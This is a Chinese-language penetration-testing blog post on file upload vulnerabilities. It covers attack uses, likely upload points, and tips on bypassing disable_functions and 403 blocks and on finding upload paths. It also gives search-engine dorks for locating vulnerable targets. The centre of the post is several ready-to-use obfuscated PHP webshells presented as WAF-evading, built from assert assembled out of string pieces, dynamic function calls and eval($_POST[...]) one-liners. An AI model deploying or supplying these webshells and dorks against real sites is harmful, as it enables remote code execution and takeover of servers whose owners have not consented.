3.1_文件上传漏洞

文件上传漏洞


  1. 文件上传漏洞原理:未对用户提交的文件进行严格校验,就将恶意文件解析执行,导致用户可以提交恶意的文件进行攻击;

  2. 利用方式(危害):

    1). 上传 HTML/SVG 进行 XSS 攻击,窃取 Cookie ;(CSRF + XSS

    2). 上传 Webshell 文件 Getshell;( Webshell 文件:phpaspjsp等 )

    3). 上传 Docx 宏病毒文件,对数据进行 窃取和破坏;

  3. 可能存在的文件上传的功能点(文资留商用)

    1) . 文件编辑处 文件上传;

    2) . 资料认证处 文件上传;

    3) . 留言评论处 文件上传;

    4) . 商品编辑处 文件上传;

    5) . 用户信息处 文件上传;

绕过方式


文件上传绕WAF:免杀webshell


<?php
$a = substr_replace("assexx","rt",4);
$b=[''→$a($_POST['q'])];
?>

<?php
$a = $_GET['A'];
$b = $_POST['B'];
$a($b);
?>

<?php
$a ="a";
$s ="s";
$c=$a.$s."sert";
foreach(array('_GET') as $r){
foreach($$r as $k => $v){
$c($v);
}}
?>

# 参数名=phpinfo();
# <?php phpinfo();@Eval($_POST[1]);?>
# <? @eval($_POST[1]); ?>

其他


  1. 网站设置了 Disable_functions 如何进行绕过?
    1). 作用:限制命令执行;
    2). 绕过:蚁剑/哥斯拉上安装插件进行绕过;
  2. 为什么上传了恶意文件,但连接不上 ?
    1). 恶意文件内容有误;
    2). 上传的恶意文件无法被解析;
    3). 当前目录不能执行脚本文件;
    4). 安全设备进行了拦截;
  3. 为什么可以正常访问图片,但访问上传脚本显示403?
    1). 当前目录不能执行脚本文件;
    2). 安全设备进行了拦截;
  4. 绕过403工具:403ByPassser-master,X-Forwarded-For 插件
  5. 脚本上传后,如何找到其路径?
    1). 上传页面F12查看源码;
    2). Brup抓包,查看是否泄露了其上传路径;
    3). 查看网站图片路径,试着修改文件名,看图片目录下是否存在上传文件;
    4). 通过目录扫描寻找可疑的目录;
  6. Google语法:inurl:upload.php , intitle="未选择文件"
  7. FOFA语法:title="upload"

免责声明


  1. 本专栏内容仅供参考,不构成任何投资、学习或专业建议。读者在参考本专栏内容时,应结合自身实际情况,谨慎作出决策。

  2. 本专栏作者及发布平台尽力确保内容的准确性和可靠性,但无法保证内容的绝对正确。对于因使用本专栏内容而导致的任何损失,作者及发布平台概不负责。

  3. 本专栏部分内容来源于网络,版权归原作者所有。如有侵权,请及时联系我们,我们将尽快予以处理。

  4. 读者在阅读本专栏内容时,应遵守相关法律法规,不得将内容用于非法用途。如因读者行为导致不良后果,作者及发布平台不承担任何责任。

  5. 本免责声明适用于本专栏所有内容,包括文字、图片、音频、视频等。读者在阅读本专栏内容时,视为已接受本免责声明。

  6. 作者及发布平台保留对本免责声明的解释权和修改权,如有变更,将第一时间在本专栏页面进行公告。读者继续使用本专栏内容,视为已同意变更后的免责声明。

敬请广大读者谅解。如有疑问,请联系我们。谢谢!

相关推荐
vortex51 小时前
Burp与其他安全工具联动及代理设置教程
网络·安全
xserver22 小时前
ensp 基于端口安全的财务部网络组建
网络·安全
孤独的履行者3 小时前
入门靶机:DC-1的渗透测试
数据库·python·网络安全
Blankspace学4 小时前
Wireshark软件下载安装及基础
网络·学习·测试工具·网络安全·wireshark
x66ccff4 小时前
HTTPS如何通过CA证书实现安全通信,以及HTTPS的局限性
网络协议·安全·https
梁小憨憨5 小时前
机器学习(Machine Learning)的安全问题
人工智能·安全·机器学习
CVE-柠檬i7 小时前
Yakit靶场-高级前端加解密与验签实战-全关卡通关教程
网络安全
toto41213 小时前
线程安全与线程不安全
java·开发语言·安全
CESS_Cloud16 小时前
CESS 出席华盛顿区块链政策峰会:参与国家安全与数据隐私保护专题讨论
安全·阿里云·web3·去中心化·区块链
阿Q说代码18 小时前
合合信息:视觉内容安全技术的前沿进展与应用
后端·安全